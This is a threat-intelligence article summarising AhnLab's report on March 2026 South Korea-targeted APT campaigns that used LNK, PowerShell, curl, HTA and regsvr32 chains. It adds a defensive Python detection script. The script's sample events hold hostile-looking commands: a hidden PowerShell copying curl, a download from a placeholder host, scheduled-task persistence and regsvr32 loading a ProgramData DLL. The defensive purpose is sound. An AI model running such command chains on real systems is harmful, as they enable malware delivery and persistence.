South Korea APT Campaigns in March 2026 Rely on LNK Files and Multi-Stage Scripting

Answer Brief

In March 2026, AhnLab observed South Korea-targeted APT attacks primarily using spear-phishing emails with LNK files to deploy malware via PowerShell, curl, HTA, and scripting chains, leading to info-stealers, keyloggers, and memory-resident backdoors.

[Figure: Diagram of the APT attack chain using LNK files, scripting, and legitimate tools to deploy malware and maintain persistence in South Korea-targeted campaigns]

Why It Matters

The AhnLab ASEC report on March 2026 APT activity in South Korea highlights a consistent reliance on social engineering via spear-phishing, with LNK files serving as the dominant initial infection vector. This aligns with broader trends in East Asia where trusted file formats are abused to bypass user suspicion and endpoint controls. The use of LNK files to launch PowerShell reflects a low-cost, high-efficacy technique that leverages legitimate system tools for malicious execution, reducing the need for custom packers or exploit chains.

Five distinct malware types (Types A-E) were identified, each demonstrating a different approach to payload delivery and persistence. Type A uses LNK-triggered PowerShell to download a copy of curl.exe, which then fetches and executes AutoIt malware, with persistence achieved through Windows Task Scheduler—a common but effective method for maintaining access without dropping obvious startup artifacts. This chain illustrates how attackers blend legitimate utilities (curl, PowerShell) with scripting languages (AutoIt) to evade detection.

Technical Signal

Type B attacks leverage the legitimate curl.exe binary to download malicious HTA files into the %TEMP% directory, which then deploy decoy documents alongside sys.dll-based info-stealers, keyloggers, and memory-resident backdoors. The use of HTA (HTML Application) files is notable for its ability to execute JavaScript and VBScript in a trusted context, often bypassing script execution restrictions. The inclusion of both info-stealing and keylogging capabilities suggests a dual focus on credential harvesting and long-term surveillance.

Type C represents a supply-chain-adjacent tactic, using Base64-encoded scripts to retrieve decoys and additional payloads from GitHub, specifically to distribute XenoRAT malware. This abuse of legitimate platforms like GitHub for malware hosting underscores the challenge of monitoring trusted developer infrastructure for malicious use, particularly when combined with encoding techniques that obscure content from simple signature-based detection.

Operational Impact

Type D employs a complex, multi-stage execution flow involving XML, VBS, PowerShell, BAT, and Python scripts to install a backdoor capable of remote command execution and file control. This diversity in scripting languages indicates a deliberate attempt to fragment the attack chain across different monitoring tools and logging systems, increasing the likelihood that at least one stage evades detection. The flexibility to control files and execute commands remotely suggests a focus on operational persistence rather than immediate data theft.

Type C and Type E both demonstrate advanced obfuscation and memory-based execution techniques. Type E uses JSE (JScript Encoded) files to drop malicious DLLs and decoys into %ProgramData%, then loads the DLL directly into memory via regsvr32.exe, avoiding disk-based detection of the malicious component. This reflects a growing trend in fileless or memory-only malware execution, which complicates traditional antivirus and endpoint detection and response (EDR) tools that rely on file scanning.

What To Watch

The report concludes that the ultimate goals of these campaigns are system control and information exfiltration via backdoors, info-stealers, and keyloggers. It emphasizes user vigilance against unsolicited emails and attachments, as well as the importance of maintaining updated operating systems, browsers, and security products. For US-based security teams monitoring South Korea or East Asia, this report provides actionable insight into TTPs commonly used in regional APT campaigns, particularly the abuse of LNK files, scripting chains, and legitimate binaries (curl, PowerShell, regsvr32) to achieve stealthy, persistent access.

The important editorial point is that this is a South Korea threat-landscape signal, not a claim that the same campaign has directly hit U.S. organizations. AhnLab ASEC is useful because it shows what local researchers are seeing in their own operating environment. U.S.-oriented readers should treat that as situational awareness for regional subsidiaries, suppliers, managed service providers, and partners rather than as a universal incident alert.

For monitoring teams, the first task is to preserve the source boundaries. The source item is titled "2026년 3월 APT 공격 동향 보고서(국내)" (March 2026 APT Attack Trends Report (Domestic)), so the article should keep the report's local scope clear while translating the tactics, tooling, affected surfaces, and observed pattern into English. That makes the item useful without overstating victim geography or implying broader impact that the source did not document.

The practical value comes from comparison against internal telemetry. Teams with exposure in South Korea can check whether help-desk tickets, endpoint alerts, mail gateway detections, identity anomalies, blocked downloads, command-line activity, scheduled tasks, or suspicious script execution resemble the behaviors described by the source. A match does not prove attribution, but it can justify deeper triage.
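As an added illustration of that telemetry comparison (example code written for this article, not code from the AhnLab report or from Nogosee), the following Python maps stages of the Type A, B and E chains described above to simple process-creation rules and runs them over constructed sample events. The event field names, file paths, the renamed-curl "orig" field and the use of explorer.exe as the parent of an LNK-launched process are assumptions.

```python
import re

def base(path):
    """Basename of a Windows path, lower-cased, for image/parent comparisons."""
    return path.rsplit("\\", 1)[-1].lower()

TEMP = re.compile(r"(?i)(\\temp\\|%temp%)")  # %TEMP% or the expanded Temp folder

# Each rule maps one stage described in the report to a process-creation predicate.
RULES = [
    # Type A/B: a shortcut launched by the user runs PowerShell (explorer.exe parent) that fetches content
    ("lnk_powershell_download", lambda e: base(e["parent"]) == "explorer.exe"
        and base(e["image"]) == "powershell.exe"
        and re.search(r"(?i)curl|http|downloadstring|invoke-webrequest|-enc", e["cmd"])),
    # Type A/B: curl.exe, or a renamed copy of it (assumed "orig" field), writing a download into Temp
    ("curl_download_to_temp", lambda e: "curl.exe" in (base(e["image"]), e.get("orig", "").lower())
        and " -o " in e["cmd"] and TEMP.search(e["cmd"])),
    # Type A: persistence via a scheduled task created by a script host rather than an admin session
    ("schtasks_from_script_host", lambda e: base(e["image"]) == "schtasks.exe"
        and "/create" in e["cmd"].lower()
        and base(e["parent"]) in {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}),
    # Type B: an HTA executed from the Temp folder
    ("mshta_temp_hta", lambda e: base(e["image"]) == "mshta.exe"
        and TEMP.search(e["cmd"]) and e["cmd"].lower().endswith(".hta")),
    # Type E: regsvr32 loading a DLL dropped under %ProgramData%
    ("regsvr32_programdata_dll", lambda e: base(e["image"]) == "regsvr32.exe"
        and re.search(r"(?i)\\programdata\\.*\.dll", e["cmd"])),
]

def match_events(events):
    """Return (rule name, event id) pairs for every event that fires a rule."""
    return [(name, e["id"]) for e in events for name, pred in RULES if pred(e)]

# Constructed sample telemetry (not from the AhnLab report); field names are assumptions.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell -w hidden -c Copy-Item C:\Windows\System32\curl.exe $env:TEMP\c.exe"},
    {"id": 2, "parent": PS, "image": r"C:\Users\u\AppData\Local\Temp\c.exe", "orig": "curl.exe",
     "cmd": r"c.exe -o C:\Users\u\AppData\Local\Temp\inv.hta http://placeholder.invalid/x"},
    {"id": 3, "parent": PS, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /sc minute /mo 10 /tn Update /tr C:\Users\u\AppData\Local\Temp\a.exe"},
    {"id": 4, "parent": r"C:\Windows\System32\curl.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta C:\Users\u\AppData\Local\Temp\inv.hta"},
    {"id": 5, "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\ProgramData\sys.dll"},
    {"id": 6, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad report.txt"},  # benign control event, fires nothing
]

if __name__ == "__main__":
    for rule, eid in match_events(SAMPLE_EVENTS):
        print(f"event {eid}: {rule}")
```

A hit is a triage lead, not attribution; the rules are deliberately narrow so they can be tuned against a site's own baseline of legitimate curl, mshta and regsvr32 use.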

This kind of regional report also helps separate durable monitoring themes from one-off news. If similar malware families, delivery chains, file types, infrastructure choices, or attacker workflows appear across later South Korea sources, the signal becomes stronger. Nogosee should keep those links visible in the tracker so readers can see whether a local report remains isolated or becomes part of a broader pattern.

Event Type: security
Importance: medium

Affected Companies

  • AhnLab

Affected Sectors

  • Critical Infrastructure
  • Cybersecurity
  • Government

Key Numbers

  • MD5 hash samples cited: 5
  • Malware types described: 5 (Types A-E)
  • Attack vector prevalence: LNK files most common

Timeline

  1. AhnLab monitored APT attacks targeting South Korea
  2. Report published by ASEC/AhnLab

Frequently Asked Questions

What was the most common initial attack vector in South Korea-targeted APT campaigns in March 2026?

The most common initial attack vector was spear-phishing emails containing LNK (shortcut) files, which were used to trigger PowerShell execution and download further malware payloads.

What types of malware were delivered in the APT campaigns described in the AhnLab report?

The campaigns delivered AutoIt-based malware via curl.exe copies, malicious HTA files leading to info-stealers and keyloggers, Base64-encoded scripts from GitHub deploying XenoRAT, multi-stage XML/VBS/PowerShell/BAT/Python backdoors, and JSE-triggered DLLs loaded via regsvr32 for memory-resident backdoor functionality.

How did attackers achieve persistence in the Type A attack chain described in the report?

In Type A attacks, attackers used LNK files to execute PowerShell, which copied curl.exe to download and run AutoIt malware, then established persistence via Windows Task Scheduler.
